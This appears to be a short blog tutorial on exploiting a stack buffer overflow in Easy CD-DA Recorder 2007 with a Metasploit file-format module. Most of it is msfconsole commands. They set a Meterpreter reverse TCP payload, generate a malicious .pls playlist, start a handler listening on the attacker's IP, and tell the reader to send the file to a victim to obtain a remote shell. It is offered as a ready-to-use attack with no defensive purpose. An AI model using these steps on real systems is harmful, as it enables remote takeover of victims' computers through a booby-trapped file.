This module exploits stack-based
buffer overflow vulnerability in Easy CD-DA Recorder 2007, caused by a long
string in a playlist entry. By persuading the victim to open a specially-crafted
.PLS file, a remote attacker could execute arbitrary code on the system or
cause the application to crash. This Metasploit module has been tested
successfully on Windows XP SP3 and Windows 7 SP1
Exploit
Targets
Easy CD-DA Recorder 2007
Requirement
Attacker: kali Linux
Victim
PC: Windows 7
Now type use
exploit/windows/fileformat/easycdda_pls_bof
msf exploit (easycdda_pls_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (easycdda_pls_bof)>set lhost 192.168.1.6 (IP of Local
Host)
msf exploit (easycdda_pls_bof)>exploit
After we successfully generate the malicious pls File, it will stored on your local
computer
/root/.msf4/local/msf.pls
Now
we need to set up a listener to handle reverse connection sent by victim when
the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.6
exploit
Now
send your msf.pls files to
victim, as soon as they download and open it. Now you can access meterpreter
shell on victim computer
0 comments:
Post a Comment